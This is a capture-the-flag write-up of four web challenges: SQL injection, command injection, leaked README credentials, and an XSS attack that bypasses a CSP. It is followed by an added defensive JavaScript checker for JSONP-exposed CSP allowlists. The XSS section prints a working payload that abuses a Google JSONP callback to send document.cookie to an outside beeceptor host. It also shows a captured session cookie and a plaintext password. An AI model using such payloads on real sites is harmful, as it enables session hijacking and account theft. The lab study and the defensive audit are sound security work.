CAT CTF.ae-Write-up

Let's solve the web challenges…

1 - Challenge Name : Admin Panel

Admin Panel
user and pass = Guest_101
Welcome Guest!
cookies
I will try SQL injection
alert (Forbidden)
it is SQL injection
Log in with SQL injection
The alert includes the flag

2 - Challenge Name : Greeting Generator

Greeting Generator
command injection
The result of the command injection
command injection
The result of the new command injection

3 - Challenge Name : Sorry Wilson

Sorry Wilson
Unknown username and password
README.md
user: forest.jenny :: password: P@ssw0rd!
uid=f.captin
uid=f.captin

4 - Challenge Name : Support Ticket 2.0

Support Ticket 2.0
XSS payload
The XSS payload works
CSP Evaluator
The trusted sources allowed to load and execute JavaScript

"><script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(document.cookie)"></script>

<script src="//accounts.google.com/o/oauth2/revoke?callback=eval(document.location='https://Ahmed.free.beeceptor.com'.concat(document.cookie))"></script>

cookie=session=s%3A6PZYod9n7ENwZ7iDudPtgBkEd6MJstV8.WyFSMUj13Kf6j3Fnk8mIk1MN%2FLhaElmE%2FN16Q%2FPJhH4

403 — Permission denied. Not admin!
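The payloads above work because the policy trusts accounts.google.com as a script source, and that host serves a JSONP callback. As an added example (not code from the original write-up), the check below audits a CSP header for allowlisted script hosts with a known JSONP endpoint; the function names and the two sample policies are assumptions constructed for illustration.

```javascript
// JSONP endpoints on commonly allowlisted hosts. Only this entry comes from the
// write-up; extend the map from your own review of each allowlisted origin.
const JSONP_HOSTS = { "accounts.google.com": "/o/oauth2/revoke?callback=" };

// Parse a CSP header value into { directive: [source, ...] }.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // A repeated directive is ignored by browsers: the first one wins.
    if (!(name in policy)) policy[name] = tokens.slice(1);
  }
  return policy;
}

// Reduce a source expression to a host pattern, or null for keywords/nonces.
function hostPattern(source) {
  if (source.startsWith("'")) return null; // 'self', 'nonce-...', ...
  // A bare http(s): scheme allows any host; data:, blob: etc. name no host.
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return /^https?:$/i.test(source) ? "*" : null;
  // Drop scheme, path and port; paths are ignored here to stay conservative.
  return source.replace(/^[a-z][a-z0-9+.-]*:\/\//i, "").split("/")[0].split(":")[0].toLowerCase();
}
function hostMatches(pattern, host) {
  if (pattern === "*") return true;
  if (pattern.startsWith("*.")) return host.endsWith(pattern.slice(1));
  return pattern === host;
}

// Return one finding per script source that admits a known JSONP endpoint.
function auditScriptSources(header) {
  const policy = parseCsp(header);
  const sources = policy["script-src"] || policy["default-src"] || [];
  // With 'strict-dynamic', CSP3 browsers ignore host-based allowlist entries.
  if (sources.some((s) => s.toLowerCase() === "'strict-dynamic'")) return [];
  const findings = [];
  for (const source of sources) {
    const pattern = hostPattern(source);
    if (pattern === null) continue;
    for (const [host, path] of Object.entries(JSONP_HOSTS)) {
      if (hostMatches(pattern, host)) findings.push({ source, endpoint: host + path });
    }
  }
  return findings;
}

// Constructed sample policies (the challenge's real header is not in the write-up).
const WEAK = "default-src 'self'; script-src 'self' https://accounts.google.com";
const STRICT = "script-src 'nonce-r4nd0m' 'strict-dynamic'; object-src 'none'";
console.log(auditScriptSources(WEAK), auditScriptSources(STRICT));
```

A finding means the allowlist entry should be replaced by a nonce- or hash-based policy, since any page that may load scripts from that host can be made to run attacker-chosen callbacks.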

End of the web challenges… I solved them :)

I would like to thank my new team for helping me solve the challenges

Ahmed Magdy